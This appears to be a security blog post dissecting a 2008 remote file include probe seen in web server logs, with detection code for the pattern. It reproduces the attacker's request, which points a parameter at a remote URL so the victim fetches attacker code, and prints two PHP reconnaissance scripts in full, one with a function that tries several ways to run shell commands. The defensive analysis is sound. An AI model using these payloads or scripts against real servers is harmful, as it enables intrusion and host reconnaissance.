MrNeti Tries to Enter the House

This was an interesting one: I just ran across this alert from my IDS:

66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252

It seems someone is trying to make the target script pull in an arbitrary remote file and execute it, a classic remote file include (RFI). The request overrides DOCUMENT_ROOT with a URL, so a script that builds an include path from that variable ends up fetching the attacker's file instead of a local one; the trailing "??" turns whatever path the script appends into a query string on the attacker's URL, so the same file comes back regardless of the suffix. Note that the request got a 404, so this particular probe did not find its target. Tracking down the file I found it contained the following code:

<?php
// Human-readable size helper; it buckets by digit count rather than by value.
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number / 1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number / 1024 / 1024);
    }
    return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}

echo "MrNETi<br>";                // banner the attacker looks for in the response
$un = @php_uname();               // kernel/host string, equivalent to `uname -a`
$id1 = system('id');              // runs `id`; system() writes its output to the page
                                  // immediately and also returns the last line.
                                  // (The original used the bare constant id, which older
                                  // PHP treated as the string "id" with a notice; PHP 8
                                  // would refuse it, hence the quotes here.)
$pwd1 = @getcwd();                // directory the include is executing from
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;

// Second banner plus the collected values; the `id` result is printed a second time here.
echo "MrNETi<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;                             // stop so none of the victim page's own output follows

Now, if this code were to execute (on my Linux VMware image) it would produce the following output. The id line appears twice because system() writes the command output straight to the page when it runs, and the captured value is echoed again further down:

MrNETi
uid=74(apache) gid=74(apache) groups=74(apache) MrNETi
uname -a: Linux localhost 2.6.22.12-desktop586-1mdv #1 SMP Tue Nov 20 08:09:17 EST 2007 i686
os: Linux
id: uid=74(apache) gid=74(apache) groups=74(apache)
free: 3.46 Gb
used: 4.22 Gb
total: 7.68 Gb

This looks like a pretty basic reconnaissance script: it reports who the web server runs as, the kernel, and how much disk is available, which is exactly what an attacker wants to know before uploading something heavier. Keep an eye out for it though, its presence may lead to more nasty attacks. A request like the one above is only a probe (here it drew a 404), but if you see this script's output, the MrNETi banner and the uname/id lines, going back out over your wire, you know a remote file include vulnerability exists and has been exploited.

I did a little checking and couldn't find any known systems that utilize e404.php that could be vulnerable to a file include attack, but I'm sure one is out there if folks are searching for it. The parameter name is a hint about the target: a script that does include($DOCUMENT_ROOT . '/something.php') is only exploitable this way if register_globals is on or the script fills $DOCUMENT_ROOT from the request itself.
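Detection logic for the pattern above, written as an added example for this post and not code from the original or from the script's authors. It parses Apache-style access-log lines like the one at the top of the post, flags any query parameter whose value carries a URL scheme or PHP stream wrapper, uses the HTTP status to separate a probe against a missing script from one that reached a real target, shows what the "??" tail does to the final include path, and checks a response body for the banner strings the two recon scripts print. The first sample log line is the one from the post; the other two lines, the example.invalid host and the /includes/header.php suffix are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log prefix: ip ident user [timestamp] "METHOD target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# A parameter whose value starts with a URL scheme or PHP stream wrapper is being
# fed to an include()/require(); legitimate path parameters do not look like this.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?|php|data|expect|phar)://', re.IGNORECASE)

# Banner and field labels emitted by the MrNETi and FeeLCoMz scripts shown on this page.
# These belong in the *response*: seeing them means the include actually ran.
RECON_MARKERS = ("MrNETi", "FeeLCoMz", "uname -a:", "id: uid=", "srvname:")

# Sample input: the first line is the log entry from the post; the other two are
# constructed for this example (example.invalid is a reserved, non-routable name).
SAMPLE_LOGS = [
    '66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252',
    '10.0.0.5 - - [30/Jul/2008:04:33:10 -0400] "GET /node/12?page=2 HTTP/1.1" 200 8120',
    '198.51.100.7 - - [30/Jul/2008:04:35:02 -0400] "GET /includes/config.php?path=http://example.invalid/x.txt? HTTP/1.0" 200 612',
]


def parse_log_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def rfi_indicators(target):
    """(param, value) pairs in the request target whose value points at a remote resource."""
    query = urlsplit(target).query
    # keep_blank_values so a trailing '??' is preserved rather than dropped
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(v)]


def classify(line):
    """Label a log line: benign, an RFI probe that hit a missing script, or an RFI
    attempt that reached an existing script and needs follow-up."""
    rec = parse_log_line(line)
    if rec is None:
        return None
    hits = rfi_indicators(rec["target"])
    if not hits:
        rec["verdict"] = "benign"
        return rec
    rec["params"] = hits
    # 404 (as in the post's log line) means the targeted script is not there; anything
    # else means the include path was reachable and the response should be examined.
    rec["verdict"] = "rfi_probe_no_target" if rec["status"] == 404 else "rfi_attempt"
    return rec


def effective_include(param_value, script_suffix):
    """URL actually fetched by include($DOCUMENT_ROOT . script_suffix) when $DOCUMENT_ROOT
    is attacker-controlled: the trailing '??' pushes the script's own suffix into the
    query string, so the attacker's file is still what comes back. script_suffix is a
    hypothetical stand-in for whatever the vulnerable script appends."""
    parts = urlsplit(param_value + script_suffix)
    return parts._replace(query="", fragment="").geturl()


def response_shows_recon(body):
    """Markers from the recon scripts found in a response body (empty list if none)."""
    return [m for m in RECON_MARKERS if m in body]


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        rec = classify(line)
        print(rec["verdict"], rec["ip"], rec.get("params", ""))
    print(effective_include(
        "http://www.cafelecaire.com/gallery/data/mraneti.txt??", "/includes/header.php"))
```

The request-side check alone only tells you someone is scanning; pair it with the response-side marker check (or a watch on outbound fetches from the web server to the URL in the parameter) before calling an incident.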

On and On

This must be a popular attack, I found the same script at http://www.netops-fr.info/remote/ident.txt only that one is credited to Osirys. I found another at http://mabat.edumining.info/oye.txt that was credited to raCrew.

I also found a different version of the same sort of thing at http://www.netops-fr.info/remote/ident.txt that looks like this:

<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
// Try each command-execution primitive in turn (see ex() below); if every one is
// disabled, fall back to the name of the process owner.
$id1 = ex("id"); if (empty($id1)) { $id1 = @get_current_user(); }
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
// The original read the register_globals variable $SERVER_ADDR, which is unset
// whenever register_globals is off; $_SERVER carries the same value.
$ip1 = @gethostbyname($_SERVER['SERVER_ADDR']);
$free1 = @diskfreespace($pwd1);
$all1 = disk_total_space($pwd1);
$used = ConvertBytes($all1 - $free1);
$free = ConvertBytes(@diskfreespace($pwd1)); if (!$free) { $free = 0; }
$all = ConvertBytes(@disk_total_space($pwd1)); if (!$all) { $all = 0; }
// [W] means the current directory is writable, i.e. a drop point for further files.
if (@is_writable($pwd1)) { $perm = "[W]"; } else { $perm = "[R]"; }
// safe_mode status is reported in the banner itself.
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $sf = "ON"; } else { $sf = "OFF"; }

echo "FeeLCoMz" . $sf . "<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

// Functions are defined after use; PHP hoists top-level function declarations.
function ConvertBytes($number) {
  $len = strlen($number);
  if ($len < 4) { return sprintf("%d b", $number); }
  if ($len >= 4 && $len <= 6) { return sprintf("%0.2f Kb", $number / 1024); }
  if ($len >= 7 && $len <= 9) { return sprintf("%0.2f Mb", $number / 1024 / 1024); }
  return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}

// Run a command with whichever execution function disable_functions has left enabled.
function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if (function_exists('exec')) {
      @exec($cfe, $res);
      $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif (function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif (function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif (@is_resource($f = @popen($cfe, "r"))) {
      $res = "";
      while (!@feof($f)) { $res .= @fread($f, 1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;

?>

RFI

I see quite a bit of that, just looking for RFIs in the web app and if it works it gets some info on the box. Cute.
